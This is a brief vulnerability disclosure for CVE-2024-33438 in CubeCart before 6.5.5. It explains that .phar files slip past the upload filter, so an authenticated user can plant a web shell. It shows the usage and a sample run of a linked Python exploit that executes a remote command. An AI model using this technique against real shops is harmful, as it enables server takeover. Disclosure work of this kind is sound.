CubeCart < 6.5.5 - Authenticated File Upload May Lead To RCE (CVE-2024-33438)

TL;DR

Although the application prevents most PHP extensions (e.g. .php, .php4, .php5, .phtml, etc) from being uploaded to the web server, the .phar extension is not blocked. An authenticated user with “edit” permissions to CubeCart’s file manager can upload a web shell via File Manager > Images and execute commands remotely.

Automated Exploit

I wrote an exploit in Python that automates the whole process of uploading a file and executing a command. You can download it here.

This is the usage of the PoC:

Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

After running it, this is the expected output for a successful exploitation:

python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

References

• https://github.com/julio-cfa/CVE-2024-33438/
  
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33438